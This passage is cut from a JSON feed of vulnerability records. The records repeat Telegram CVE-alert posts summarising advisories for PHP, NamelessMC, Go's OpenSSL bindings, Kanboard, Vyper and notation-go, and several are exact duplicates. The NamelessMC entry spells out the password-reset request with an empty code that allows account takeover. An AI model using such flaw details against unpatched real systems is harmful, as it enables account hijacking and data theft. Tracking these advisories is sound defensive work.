https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-01-09T22:16:14.000000Z"}, {"uuid": "f4ac465e-e4da-4b43-9eed-a54b1dead049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H35G-VWH6-M678", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1136", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8929\n\ud83d\udd39 Description: In PHP versions 8.1.* before 8.1.31, 8.2.* before 8.2.26, 8.3.* before 8.3.14, a hostile MySQL server can cause the client to disclose the content of its heap containing data from other SQL requests and possible other data belonging to different users of the same server.\n\ud83d\udccf Published: 2024-11-22T06:15:29.643Z\n\ud83d\udccf Modified: 2025-01-10T13:06:50.914Z\n\ud83d\udd17 References:\n1. https://github.com/php/php-src/security/advisories/GHSA-h35g-vwh6-m678", "creation_timestamp": "2025-01-10T14:06:00.000000Z"}, {"uuid": "9d07e8b3-b7a1-4361-bbe7-649b78a76f1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P883-7496-X35P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1374", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22144\n\ud83d\udd39 Description: NamelessMC is a free, easy to use &amp; powerful website software for Minecraft servers. A user with admincp.core.emails or admincp.users.edit permissions can validate users and an attacker can reset their password. When the account is successfully approved by email the reset code is NULL, but when the account is manually validated by a user with admincp.core.emails or admincp.users.edit permissions then the reset_code will no longer be NULL but empty. An attacker can request http://localhost/nameless/index.php?route=/forgot_password/&amp;c= and reset the password. As a result an attacker may compromise another users password and take over their account. This issue has been addressed in release version 2.1.3 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T19:49:03.887Z\n\ud83d\udccf Modified: 2025-01-13T19:49:03.887Z\n\ud83d\udd17 References:\n1. https://github.com/NamelessMC/Nameless/security/advisories/GHSA-p883-7496-x35p\n2. https://github.com/NamelessMC/Nameless/releases/tag/v2.1.3", "creation_timestamp": "2025-01-13T20:07:24.000000Z"}, {"uuid": "8dd1195b-fc8a-44b0-a896-43b721b707cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2729", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "6e668c6e-757c-41cf-95e1-8753652e959a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4672", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "40b254b3-1cc4-4882-82ed-e1626a24fcb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1462", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "ac700891-d7ae-444f-a8ec-f0568cd4bc48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WPPX-QMQH-9H33", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1375", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23027\n\ud83d\udd39 Description: next-forge is a Next.js project boilerplate for modern web application. The BASEHUB_TOKEN commited in apps/web/.env.example. Users should avoid use of this token and should remove any access it may have in their systems.\n\ud83d\udccf Published: 2025-01-13T19:41:43.514Z\n\ud83d\udccf Modified: 2025-01-13T19:41:43.514Z\n\ud83d\udd17 References:\n1. https://github.com/haydenbleasel/next-forge/security/advisories/GHSA-wppx-qmqh-9h33\n2. https://github.com/haydenbleasel/next-forge/commit/239a98f2c308a51d626ae0613102917f82603c1c", "creation_timestamp": "2025-01-13T20:07:27.000000Z"}, {"uuid": "2d0e6405-c65c-4c1b-81f8-fdfbcf31b058", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R36M-44GG-WXG2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/706", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33956\n\ud83d\udd39 Description: Kanboard is open source project management software that focuses on the Kanban methodology. Versions prior to 1.2.30 are subject to an Insecure direct object reference (IDOR) vulnerability present in the application's URL parameter. This vulnerability enables any user to read files uploaded by any other user, regardless of their privileges or restrictions. By Changing the file_id any user can render all the files where MimeType is image uploaded under **/files** directory regard less of uploaded by any user. This vulnerability poses a significant impact and severity to the application's security. By manipulating the URL parameter, an attacker can access sensitive files that should only be available to authorized users. This includes confidential documents or any other type of file stored within the application. The ability to read these files can lead to various detrimental consequences, such as unauthorized disclosure of sensitive information, privacy breaches, intellectual property theft, or exposure of trade secrets. Additionally, it could result in legal and regulatory implications, reputation damage, financial losses, and potential compromise of user trust. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\n\n\ud83d\udccf Published: 2023-06-05T19:34:51.508Z\n\ud83d\udccf Modified: 2025-01-08T16:03:58.295Z\n\ud83d\udd17 References:\n1. https://github.com/kanboard/kanboard/security/advisories/GHSA-r36m-44gg-wxg2\n2. https://github.com/kanboard/kanboard/commit/437b141fa2267df36976814e704517f30d2424bd", "creation_timestamp": "2025-01-08T16:13:32.000000Z"}, {"uuid": "43070914-8252-4892-b9b0-a5255f48111f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8QVF-9847-GPC9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/713", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33969\n\ud83d\udd39 Description: Kanboard is open source project management software that focuses on the Kanban methodology. A stored Cross site scripting (XSS) allows an attacker to execute arbitrary Javascript and any user who views the task containing the malicious code will be exposed to the XSS attack. Note: The default CSP header configuration blocks this javascript attack. This issue has been addressed in version 1.2.30. Users are advised to upgrade. Users unable to upgrade should ensure that they have a restrictive CSP header config.\n\n\n\ud83d\udccf Published: 2023-06-05T19:57:11.800Z\n\ud83d\udccf Modified: 2025-01-08T16:00:50.616Z\n\ud83d\udd17 References:\n1. https://github.com/kanboard/kanboard/security/advisories/GHSA-8qvf-9847-gpc9\n2. https://github.com/kanboard/kanboard/commit/05f1d23d821152cd61536d3b09e522c0f7573e3c", "creation_timestamp": "2025-01-08T16:15:48.000000Z"}, {"uuid": "ca8612dc-9920-4b54-8628-dcdbfba47eb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VGF2-GVX8-XWC3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1557", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-21607\n\ud83d\udd39 Description: Vyper is a Pythonic Smart Contract Language for the EVM. When the Vyper Compiler uses the precompiles EcRecover (0x1) and Identity (0x4), the success flag of the call is not checked. As a consequence an attacker can provide a specific amount of gas to make these calls fail but let the overall execution continue. Then the execution result can be incorrect. Based on EVM's rules, after the failed precompile the remaining code has only 1/64 of the pre-call-gas left (as 63/64 were forwarded and spent). Hence, only fairly simple executions can follow the failed precompile calls. Therefore, we found no significantly impacted real-world contracts. None the less an advisory has been made out of an abundance of caution. There are no actions for users to take.\n\ud83d\udccf Published: 2025-01-14T17:32:58.169Z\n\ud83d\udccf Modified: 2025-01-14T17:32:58.169Z\n\ud83d\udd17 References:\n1. https://github.com/vyperlang/vyper/security/advisories/GHSA-vgf2-gvx8-xwc3", "creation_timestamp": "2025-01-14T18:10:03.000000Z"}, {"uuid": "fee20095-6038-44f6-aa36-e78fb6e4468b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4960", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "9bcf0914-782a-47b7-9c86-c3c073983941", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1566", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "c1351544-5710-4b95-94df-63081c3413c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QJH3-4J3H-VMWP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1418", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-51491\n\ud83d\udd39 Description: notion-go is a collection of libraries for supporting sign and verify OCI artifacts. Based on Notary Project specifications. The issue was identified during Quarkslab's security audit on the Certificate Revocation List (CRL) based revocation check feature.\nAfter retrieving the CRL, notation-go attempts to update the CRL cache using the os.Rename method. However, this operation may fail due to operating system-specific limitations, particularly when the source and destination paths are on different mount points. This failure could lead to an unexpected program termination. In method `crl.(*FileCache).Set`, a temporary file is created in the OS dedicated area (like /tmp for, usually, Linux/Unix). The file is written and then it is tried to move it to the dedicated `notation` cache directory thanks `os.Rename`. As specified in Go documentation, OS specific restriction may apply. When used with Linux OS, it is relying on rename syscall from the libc and as per the documentation, moving a file to a different mountpoint raises an EXDEV error, interpreted as Cross device link not permitted error. Some Linux distribution, like RedHat use a dedicated filesystem (tmpfs), mounted on a specific mountpoint (usually /tmp) for temporary files. When using such OS, revocation check based on CRL will repeatedly crash notation. As a result the signature verification process is aborted as process crashes. This issue has been addressed in version 1.3.0-rc.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T21:42:11.493Z\n\ud83d\udccf Modified: 2025-01-13T21:42:11.493Z\n\ud83d\udd17 References:\n1. https://github.com/notaryproject/notation-go/security/advisories/GHSA-qjh3-4j3h-vmwp\n2. https://github.com/notaryproject/notation-go/commit/3c3302258ad510fbca2f8a73731569d91f07d196\n3. https://man7.org/linux/man-pages/man2/rename.2.html", "creation_timestamp": "2025-01-13T22:10:33.000000Z"}, {"uuid": "19f21514-0288-43ea-b379-c9676297cb5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2767", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. 